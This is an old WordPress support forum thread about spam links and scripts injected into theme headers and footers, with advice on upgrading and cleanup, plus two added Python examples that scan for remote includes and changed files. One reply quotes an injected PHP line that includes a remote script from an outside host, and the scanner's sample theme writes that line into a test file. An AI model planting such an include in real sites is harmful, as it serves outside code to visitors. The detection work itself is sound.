WordPress.org


Forums

php get footer adding spam code? (16 posts)

  1. rkeaveney
    Member
    Posted 6 years ago #

    I've recently been notified that my page is serving up some spam code (and apparently a virus). I've been using the sIFR text replacement plugin, which asks for the <?php get_footer(); ?> code to be inserted into the footer.php file. However, a foreign div loads in the footer, "div id=goro", with a list of spam links to various pharmaceuticals on "mojopages.com". I have no idea how this div is loading, but it seems to be tied in to the <?php get_footer(); ?> as disabling it fixes the issue; however, I then cannot use the sIFR plugin. If anyone is interested in taking a look please let me know and I can modify the code to show the mystery spam div.

  2. whooami
    Member
    Posted 6 years ago #

    the cause of that, just so you know, is not the plugin..

    chances are that the theme you are using is a sponsored one:

    http://wordpress.org/search/sponsored+themes?forums=1

    ^^ much ado about unscrupulous themes and their writers (term provided loosely)

    If you can provide a zip of the complete theme, or give a link to where EXACTLY (the page, exactly, I will NOT hunt a site) you downloaded it from -- I will happily assist in finding the root cause for you, so that you can remove it.

  3. rkeaveney
    Member
    Posted 6 years ago #

    Thank you for replying. The original theme was "Almost Spring", but has since been heavily modified. In fact that was a year ago. Only now have I been made aware of the problem. The site URL is http://www.cinemusic.net.

    Thank you for your help with this.

  4. whooami
    Member
    Posted 6 years ago #

    huh?

    I don't want the original theme link -- She does not and didn't ever add any spam links to her footers.

    Second, this: http://www.cinemusic.net ?? What's that for?

    --

    I am going to restate what I said above. If you want help YOU need to provide the EXACT page you downloaded the theme from. I don't want your site, unless you are providing a link to download the files. I don't want a link to the theme before it had links to it.

    ------

    On second thought, I browsed your previous posts.

    I'm assuming this is you, yes:

    Klaatu Media specializes in the design and maintenance of websites for film, television and videogame composers, related artists and businesses.

    ?

    Correct me if I am wrong but you are doing paid work for this other site?

    You will need to find someone else to assist you if that is the case, unless of course you are willing to paypal me for my time.

    I apologize if it appears I've led you down some path; it was not intentional. However, I have a rule of not willingly assisting ppl that are being paid, unless they are willing to pay me for my time and effort. I assure you it is nothing personal.

  5. rkeaveney
    Member
    Posted 6 years ago #

    I'm confused. When I first moved my website, Cinemusic.net, to WordPress format, I used the Almost Spring theme as a starting point (hence my linking to the exact site I downloaded the theme from, like you asked). I then modified the theme beyond all recognition.

    A year later I get an email saying someone was prompted to download a virus while visiting Cinemusic.net. This was news to me. I viewed the code in Firefox and there in the footer was a list of spam links to "mojopages.com" for xanax, viagre, etc. This code, however, does not appear in any of the WordPress files (footer.php, etc.). I tried a few fixes: I turned off the sIFR plugin as the javascript is inserted at the end of the page. That didn't eliminate the spam code. So I removed <?php get_footer(); ?> from footer.php, reloaded the page, checked the source and the spam links were gone. My question was then how this code was inserted into my page, whether or not it was something I had done to make the site vulnerable, and as an aside, lament that without <?php get_footer(); ?> sIFR would not function.

    I am Klaatu Media and I designed Cinemusic.net. I also run the site, and write the content. I did not get paid to design Cinemusic.net as that would be rather pointless.

    I wasn't looking to suffer the wrath for asking a question. I came to the WordPress community for help. If you can help I'd appreciate it.

  6. al-zarwani
    Member
    Posted 6 years ago #

    I experienced the same, or a very similar problem. Look in your footer file. If you see this, or something like it, remove it:
    <?php include('http://wordpress.net.in/statcounter.php'); ?>

    I also found these two articles helpful:
    http://codex.wordpress.org/Hardening_WordPress
    and
    http://www.reaper-x.com/2007/09/01/hardening-wordpress-with-mod-rewrite-and-htaccess/
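
The check suggested in the post above can be run across a whole theme directory rather than one file. This is an added example, not code from the thread; the function names and the sample theme it builds are constructed for illustration, and only the include line comes from the post.

```python
import re
import tempfile
from pathlib import Path

# include/require (optionally *_once), optional "(", then a quoted literal
# that starts with a URL scheme instead of a local path.
REMOTE_INCLUDE = re.compile(
    r"""\b(include|require)(_once)?\s*\(?\s*(['"])\s*((?:https?|ftp)://[^'"]+)\3""",
    re.IGNORECASE,
)

def find_remote_includes(theme_dir):
    """Return (relative_path, line_number, url) for each PHP include/require
    whose argument is a literal remote URL."""
    root = Path(theme_dir)
    hits = []
    for path in sorted(root.rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), start=1):
            for m in REMOTE_INCLUDE.finditer(line):
                hits.append((path.relative_to(root).as_posix(), lineno, m.group(4)))
    return hits

def build_sample_theme(root):
    """Constructed sample: a clean header.php and a footer.php carrying the
    include line quoted in the post."""
    root = Path(root)
    (root / "header.php").write_text(
        "<?php include('sidebar.php'); ?>\n<?php wp_head(); ?>\n"
    )
    (root / "footer.php").write_text(
        "<?php wp_footer(); ?>\n"
        "<?php include('http://wordpress.net.in/statcounter.php'); ?>\n"
        "</body>\n</html>\n"
    )
    return root

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        return find_remote_includes(build_sample_theme(tmp))

if __name__ == "__main__":
    for rel, lineno, url in demo():
        print(f"{rel}:{lineno}: remote include of {url}")
```

It only matches URLs written as string literals; an include whose argument is built from variables or encoded strings needs a manual read of the file.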

  7. rkeaveney
    Member
    Posted 6 years ago #

    Thank you, al-zarwani, helpful tips in the second link. I did some fiddling and seem to have fixed the problem. I'm going to look into securing WordPress to prevent this from happening again.

  8. tgiokdi
    Member
    Posted 6 years ago #

    I've been having this same problem, but only with me, it was some stray JS in the template's header, so be sure to check your header.php template file for ugly unknown JS code. I have both google ads and project wonderful ads running on my site, and I've found the bad code within the advertising code. I compared the code that was listed on the advertising site to what was actually on my own site, and found a huge difference. I've had to make the template files read only to solve this. The only way that I was sure that I got rid of it was to load 'noscript' into firefox and go to the site. It was attempting to load some nefarious scripts from topae.info with the bad code.

    I'm 99% certain that there's either a WP bug or a plugin bug that's causing the problems and permitting someone to edit the files on the server, injecting their spammy code.

    I'm using 2.3.1, with a list of plugins as long as my arm, but I'm willing to provide a list if that would help.

  9. C-Monster
    Member
    Posted 6 years ago #

    i've been getting spam in both my header and footer... and i delete it, but it comes back... i'm a newbie and don't know very much tech. is there a patch for this?

  10. whooami
    Member
    Posted 6 years ago #

    c-monster, dude/dude-ette,

    your site is hacked.

    You don't need a patch, you need a lesson in how to be a responsible web master.

  11. Nazareth
    Member
    Posted 6 years ago #

    I'm getting the exact same thing- spam just keeps returning, and there is nothing in the footer that looks odd to me

    <?php
    /*
    Tiga WordPress Theme

    Copyright (C) 2006 Shamsul Azhar

    This program is free software; you can redistribute it and/or
    modify it under the terms of the GNU General Public License
    as published by the Free Software Foundation; either version 2
    of the License, or (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
    */
    ?>

    <?php wp_footer(); ?>
    <div class="footer">
    <!--
    Please do not remove attribution to me from the bottom of your page
    It's the least that you can do to acknowledge my hard work.
    If you have significantly modified this theme you can add the phrase
    "modified by xxxx".
    -->
    <p>
    <?php
    printf(_t('%s is powered by WordPress'),
    get_bloginfo('name'));
    echo(' | ');
    _te('Using Tiga theme with a bit of Ozh');
    ?>
    </p>
    </div> <!-- footer -->
    </div> <!-- page -->

    ****HERE IS WHERE THE SPAM SHOWS UP*******

    </body>
    </html>

    Has anyone got any suggestions where else to look? I've been all through my files and not knowing webmastering like some here- it's very difficult- and telling us to 'get a clue' isn't being helpful- not all of us are as code gifted as some here.

  12. whooami
    Member
    Posted 6 years ago #

    Nazareth,

    I'll be brief. Your theme is not a sponsored theme - that is to say, that you are not suffering from what the original poster was having trouble with.

    If you are seeing spam (and I should say that while I don't see what you describe, I do see very suspicious "spaces" in your source at the location you describe), your site has been exploited.

    As to where to look, that's the problem, you should be 'looking'.. what you need to be doing is upgrading..

    <meta name="generator" content="WordPress 2.0.3" />

    That's the root source of your problem.

    In the process of upgrading you need to make sure that you remove and replace ALL of the non plugin files on your site, including your theme's files. This advice varies slightly from the normal upgrade instructions, but keep in mind the normal upgrade instructions assume you have a clean site. In fact, were it me, doing the work, I would be removing the plugin files as well, and getting the files anew from their source, OR looking at their code for anything that might be suspicious.

    You need to change ALL of your passwords.

    You need to make sure that you have NO unusual files or directories within your web space.

    You need to make sure that you have no rogue users added to your wp install -- and this should be done by looking inside your database.

    There's more I am sure -- but that's a good start.
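
Before replacing the files as the checklist above describes, it helps to know which ones were altered and which should not exist at all. The following is an added example, not code from the thread: it assumes you have a freshly downloaded copy of the same theme or WordPress version to compare against, and the directory names and tampered files are constructed.

```python
import hashlib
import tempfile
from pathlib import Path

def _digests(root):
    """Map each file's path (relative to root) to its SHA-256 digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in root.rglob("*")
        if p.is_file()
    }

def compare_to_clean(clean_dir, live_dir):
    """Compare the live tree against a known-clean copy of the same release."""
    clean, live = _digests(clean_dir), _digests(live_dir)
    return {
        # present in both, but the content differs: candidate injected code
        "modified": sorted(f for f in clean if f in live and clean[f] != live[f]),
        # present only on the live site: the "unusual files" to inspect
        "unexpected": sorted(f for f in live if f not in clean),
        # shipped with the release but gone from the live site
        "missing": sorted(f for f in clean if f not in live),
    }

def demo():
    """Constructed sample: the live copy has an altered footer.php and one
    extra PHP file sitting in the images directory."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for d in (clean, live):
            (d / "images").mkdir(parents=True)
            (d / "header.php").write_text("<?php wp_head(); ?>\n")
            (d / "footer.php").write_text("<?php wp_footer(); ?>\n</body>\n</html>\n")
        (live / "footer.php").write_text(
            '<?php wp_footer(); ?>\n<div id="goro"><!-- injected links --></div>\n'
            "</body>\n</html>\n"
        )
        (live / "images" / "cache.php").write_text("<?php /* constructed */ ?>\n")
        return compare_to_clean(clean, live)

if __name__ == "__main__":
    for kind, files in demo().items():
        print(kind, files)
```

Files you edited yourself will also show up as modified, so the output is a list to review, not a verdict.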

  13. Nazareth
    Member
    Posted 6 years ago #

    I'll probably end up having to upgrade no doubt, but doing so won't teach me how to fix the problem, and I'll end up losing all my posts I've done over the last two years? How would I go about saving the posts & all the various links I've collected over the years? Manually reinserting them again? Would be better to find the hole and script, fix it, then upgrade with the theme still in place wouldn't it?

  14. whooami
    Member
    Posted 6 years ago #

    I'll probably end up having to upgrade no doubt, but doing so won't teach me how to fix the problem,

    The problem, once again, is that you have not upgraded. You're using a version of WP that is known publicly to be exploitable, and unless and until you upgrade your site will probably continue to fall victim to all kinds of maliciousness. So, yes, upgrading will teach you how to solve the problem.

    How would I go about saving the posts & all the various links I've collected over the years?

    http://codex.wordpress.org/Backing_Up_Your_Database

    Manually reinserting them again?

    http://codex.wordpress.org/Restoring_Your_Database_From_Backup

    Would be better to find the hole and script, fix it, then upgrade with the theme still in place wouldn't it?

    I'm not sure I understand that question, but if you are intent on keeping your current theme, that's fine -- but I see no issue with going and re-downloading your theme from its original source, and replacing the files. The download location of your theme is in your footer.

    It's your site, do as you like, but realize that what you do affects the rest of us that share the Internet with you.

  15. Nazareth
    Member
    Posted 6 years ago #

    Well the problem is that the Tiga theme won't work with WP upgrades & I haven't found a theme I like as well as the Tiga theme- it's got all sorts of neat configs within the theme with what they call Tigerator- you can adjust size color, header etc all in the control panel- I did the WP upgrade last night- clean install, but used automaticc to do the upgrade & it upgraded to WP 2.5, and the Tiga theme is broken- won't show my blogroll, my links, categories etc. (All the links and blogroll and category are listed in my control panel, but they simply won't show up on my site even though I've made sure the 'make visible' box is checked- Hate the new admin panel in 2.5 WP uggh)

    As well, what I really wanted to learn how to do here was to fix the exploits in the old WP- I'd read some articles on "Hardening WP" to stop these 'drive by spamming' attacks (which is what was happening I found out- ) because these exploits will become particular to even the new WP upgrades soon enough & I wanted to learn what to do- where to look, in the theme files for the vulnerabilities, as the spamming the header.php and footer.php files seems to be a common exploit which the hackers will find a way around even with the new WP upgrades at some point.

    Yeah- about the redownloading the old file, the site lists only the new theme- they apparently did away altogether with the old theme- can't find it anywhere- not that it matters now that I've upgraded.

  16. whooami
    Member
    Posted 6 years ago #

    2 things,

    1. not to rain on your parade, but if you had done the upgrade manually, you could have gone to 2.0.11 which would have allowed you to keep that theme, as is.

    2. congrats all the same on the upgrade.

    As well, what I really wanted to learn how to do here was to fix the exploits in the old WP- I'd read some articles on "Hardening WP" to stop these 'drive by spamming' attacks (which is what was happening I found out- ) because these exploits will become particular to even the new WP upgrades soon enough & I wanted to learn what to do- where to look, in the theme files for the vulnerabilities, as the spamming the header.php and footer.php files seems to be a common exploit which the hackers will find a way around even with the new WP upgrades at some point.

    that's not knowledge that comes in a matter of a few hours, and truthfully, running 2.5.x makes it more difficult than ever since the number of files included in the WP distro has tripled since 2.0.x .. In other words, there's more to learn.

    "Getting to know" wp takes time, and effort, and a good deal of reading, either the codex, or the files themselves. I do applaud the goal though -- there is something to be said for understanding what you are using. I like the feeling.

Topic Closed

This topic has been closed to new replies.
